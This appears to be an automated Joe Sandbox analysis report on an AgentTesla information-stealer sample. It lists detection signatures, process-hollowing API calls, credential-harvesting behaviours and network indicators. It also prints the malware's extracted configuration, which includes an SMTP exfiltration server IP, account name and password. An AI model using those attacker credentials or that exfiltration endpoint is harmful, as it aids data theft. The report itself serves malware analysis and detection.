Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
D6yz87XjgM.exe

Overview

General Information

Sample name:D6yz87XjgM.exe
renamed because original name is a hash value
Original sample name:6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be.exe
Analysis ID:1549405
MD5:eb180d9ac3c0ee0feb1b997ef3908f36
SHA1:17dcf2886e1dce74561ac12b4374b7d441f399b8
SHA256:6e8d235ee046154127d1d33c423c132896d2a19f2b1d68fd33333cffb964b9be
Tags:exeuser-adrian__luca
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: RegAsm connects to smtp port
Suricata IDS alerts for network traffic
Yara detected AgentTesla
AI detected suspicious sample
Contains functionality to log keystrokes (.Net Source)
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • D6yz87XjgM.exe (PID: 7748 cmdline: "C:\Users\user\Desktop\D6yz87XjgM.exe" MD5: EB180D9AC3C0EE0FEB1B997EF3908F36)
    • RegAsm.exe (PID: 7896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 7908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000008.00000002.2538240236.0000000002F5C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000008.00000002.2538240236.0000000002F64000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 19 entries
              SourceRuleDescriptionAuthorStrings
              4.2.D6yz87XjgM.exe.4090000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                4.2.D6yz87XjgM.exe.4090000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  4.2.D6yz87XjgM.exe.4090000.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x334eb:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x3355d:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x335e7:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x33679:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x336e3:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x33755:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x337eb:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3387b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  4.3.D6yz87XjgM.exe.75551c.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    4.3.D6yz87XjgM.exe.75551c.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 19 entries

                      Networking

                      barindex
                      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, Initiated: true, ProcessId: 7908, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49706
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-05T16:05:16.773977+010020229301A Network Trojan was detected4.245.163.56443192.168.2.749741TCP
                      2024-11-05T16:06:01.795556+010020229301A Network Trojan was detected4.245.163.56443192.168.2.755627TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-05T16:06:46.896832+010020301711A Network Trojan was detected192.168.2.749706162.254.34.31587TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: D6yz87XjgM.exeAvira: detected
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxsenses@vetrys.shop", "Password": "M992uew1mw6Z"}
                      Source: D6yz87XjgM.exeReversingLabs: Detection: 36%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: D6yz87XjgM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49704 version: TLS 1.2

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.7:49706 -> 162.254.34.31:587
                      Source: global trafficTCP traffic: 192.168.2.7:49706 -> 162.254.34.31:587
                      Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:49741
                      Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.7:55627
                      Source: global trafficTCP traffic: 192.168.2.7:49706 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                      Source: D6yz87XjgM.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                      Source: D6yz87XjgM.exeString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                      Source: D6yz87XjgM.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
                      Source: D6yz87XjgM.exeString found in binary or memory: http://ocsp.sectigo.com0
                      Source: RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: D6yz87XjgM.exeString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                      Source: D6yz87XjgM.exeString found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmp, D6yz87XjgM.exe, 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2536620293.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: RegAsm.exe, 00000008.00000002.2538240236.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: D6yz87XjgM.exeString found in binary or memory: https://sectigo.com/CPS0
                      Source: D6yz87XjgM.exeString found in binary or memory: https://www.globalsign.com/repository/0
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49704 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, SKTzxzsJw.cs.Net Code: BbookW6D
                      Source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, SKTzxzsJw.cs.Net Code: BbookW6D
                      Source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, SKTzxzsJw.cs.Net Code: BbookW6D

                      System Summary

                      barindex
                      Source: 4.2.D6yz87XjgM.exe.4090000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.75551c.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.755518.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.755518.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_0054A57F NtAllocateVirtualMemory,NtProtectVirtualMemory,NtProtectVirtualMemory,4_2_0054A57F
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02272B06 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,NtTerminateProcess,4_2_02272B06
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02272AF7 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,NtTerminateProcess,4_2_02272AF7
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeCode function: 4_2_02272B02 NtCreateSection,NtMapViewOfSection,CreateProcessW,NtGetContextThread,NtReadVirtualMemory,NtWriteVirtualMemory,NtUnmapViewOfSection,NtMapViewOfSection,NtSetContextThread,NtResumeThread,NtTerminateProcess,4_2_02272B02
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00444061 NtAllocateVirtualMemory,8_2_00444061
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00444095 NtProtectVirtualMemory,8_2_00444095
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00441149 NtDelayExecution,8_2_00441149
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004442FC NtProtectVirtualMemory,8_2_004442FC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00443A8E NtAllocateVirtualMemory,8_2_00443A8E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00441710 NtClose,8_2_00441710
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004413F9 NtCreateThreadEx,8_2_004413F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004444A7 NtProtectVirtualMemory,8_2_004444A7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00441A74 NtCreateThreadEx,8_2_00441A74
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00441A33 NtDelayExecution,8_2_00441A33
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_00441ADC NtCreateThreadEx,8_2_00441ADC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_0044172A NtClose,8_2_0044172A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_004443EB NtProtectVirtualMemory,8_2_004443EB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_02EA4AA08_2_02EA4AA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_02EAAA328_2_02EAAA32
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_02EADBE08_2_02EADBE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_02EA3E888_2_02EA3E88
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_02EA41D08_2_02EA41D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_068C45C08_2_068C45C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_068C5D508_2_068C5D50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_068C35608_2_068C3560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_068CE0D98_2_068CE0D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_068C10188_2_068C1018
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_068C91F88_2_068C91F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_068CA1508_2_068CA150
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_068C56708_2_068C5670
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_068C3CAB8_2_068C3CAB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_068C02F88_2_068C02F8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_068CC3708_2_068CC370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_06A1A1988_2_06A1A198
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 8_2_02EADF888_2_02EADF88
                      Source: D6yz87XjgM.exeStatic PE information: invalid certificate
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312446439.0000000000733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameacvm7qw909e.exe vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312569737.0000000003F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000002.1339579263.0000000004092000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312616624.0000000000752000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000003.1331489547.0000000000752000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000003.1312498270.0000000000756000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exe, 00000004.00000003.1331618036.0000000000756000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename22082c00-deed-4691-a953-04613633b116.exe4 vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exeBinary or memory string: OriginalFilenameacvm7qw909e.exe vs D6yz87XjgM.exe
                      Source: D6yz87XjgM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: 4.2.D6yz87XjgM.exe.4090000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.75551c.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.755518.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.75551c.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.755518.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.755518.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 4.3.D6yz87XjgM.exe.755518.2.raw.unpack, CqSP68Ir.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.spre.troj.spyw.evad.winEXE@5/1@1/2
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\eb42b1a5c308fc11edf1ddbdd25c8486_9e146be9-c76a-4720-bcdb-53011b87bd06Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                      Source: D6yz87XjgM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: D6yz87XjgM.exeReversingLabs: Detection: 36%
                      Source: unknownProcess created: C:\Users\user\Desktop\D6yz87XjgM.exe "C:\Users\user\Desktop\D6yz87XjgM.exe"
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: msvbvm60.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: vb6zz.dllJump to behavior
                      Source: C:\Users\user\Desktop\D6yz87XjgM.exeSection loaded: vb6de.dllJump to behavior
